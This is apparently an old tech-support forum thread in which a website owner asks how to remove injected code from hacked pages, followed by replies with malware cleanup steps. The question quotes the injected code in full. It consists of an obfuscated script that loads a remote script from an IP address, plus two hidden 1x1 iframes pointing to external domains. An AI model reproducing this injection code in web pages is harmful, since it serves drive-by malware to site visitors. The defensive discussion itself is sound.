Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
?
Solved

Virus Attack on my site from javascript and Iframe code

Posted on 2009-04-26
4
Medium Priority
?
489 Views
Last Modified: 2013-12-04
Hi,

My Site is hacked and hacker put some malicious code on my web pages.
They put some javascript code above the body tag and also put iframe at the bottom of the web pages.
I removed this code but It is coming again and again.
Please let me know from where it has came and how I can remove this from my site.

Secondly,I am sure there is some problem with my local machine, I am using window2003 server.
Could you please let me know some antivirus or virus removal tools, so that I can trace this virus on my local machine.

How can I remove this virus completely from my machine?

Thank you



 


 

<script language=javascript><!-- 
document.write(unescape('%3CscFurFuirjprjt6yl%20UOsFurDGc%3D6yl%2F%2F9rj46yl%2E247%2E9YL26yl%2E1DG9rj59YL%2FbtjFuqFuueDGr6yly%2E9YLjrjsbt%3E6yl%3C%2Fs6ylcrjrrjipt%3E').replace(/6yl|DG|rj|9YL|bt|Fu|UO/g,""));
 --></script>
 
<iframe src="http://vafuiek.com/?click=674958" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://internetcountercheck.com/?click=19908031" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Open in new window

0
Comment
Question by:Gurbirs
3 Comments
 
LVL 47

Accepted Solution

by:
rpggamergirl earned 1000 total points
ID: 24239107
Is your site hosted by IX Web Hosting?

In your local machine, look for any of these FAKE files(Search engine hijackers) and delete them if present in the system32 folder.
C:\Windows\system32\wdmaud.sys <-- bad
C:\Windows\system32\sysaudio.sys <-- bad
c:\windows\system32\ntnet.drv <-- bad


If the above files are not found in the system, also check the registry key below and check the values of "aux, aux1, aux2, aux3, aux4" to make sure there are no values pointing to random filenames(similar to the ones below)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"aux"="C:\\WINDOWS\\system32\\..\\jjmviih.nkt"
"aux"="C:\WINDOWS\system32\..\sjkemx.iqd"
"aux2"= "C:\WINDOWS\system32\..\kvlhurx.niq"
"aux2"="C:Windowssystem32..wkliog.nyc
"aux4"="c:\docume~1\%username%\LOCALS~1\Temp\..\herlppj.sna"



Also run MalwareBytes and Combofix:(redownload but rename the tools before saving if they don't run at first)
1.  Download Malwarebytes' Anti-Malware to your desktop, check for the tool's Updates before running a scan.
http://www.malwarebytes.org/mbam.php


2.  Please download ComboFix by sUBs: and show us the log file(it doesn't support 2003 but it will run)
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

You must download it to and run it from your Desktop
Now STOP all your monitoring programs (Antivirus/Antispyware, Guards and Shields) as they could easily interfere with ComboFix.
Double click combofix.exe & follow the prompts.
When finished, it will produce a log. Please save that log and attach it in your next reply by pasting it in the "Code Snippet" or "Attach File" window.
Re-enable all the programs that were disabled during the running of ComboFix..

Note:
Do not mouse-click combofix's window while it is running. That may cause it to stall.
CF disconnects your machine from the internet. The connection is automatically restored before CF completes its run. If CF runs into difficulty and terminates prematurely, the connection can be manually restored by restarting your machine.


If needed, here's the Combofix tutorial which includes the installation of the Recovery Console:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

0
 

Author Comment

by:Gurbirs
ID: 24239722
Is there any auto scanner software, from where I can scan this particular virus?



0
 
LVL 10

Assisted Solution

by:pand0ra_usa
pand0ra_usa earned 1000 total points
ID: 24283996
Do a google search for "web virus scanner" and choose one that you like. FYI this looks like a XSS attack. Make sure you validate ALL input and output from your web page (consider all input as hostile). OWASP guides can help you with this if it is new to you.
0

Featured Post

What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

581 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question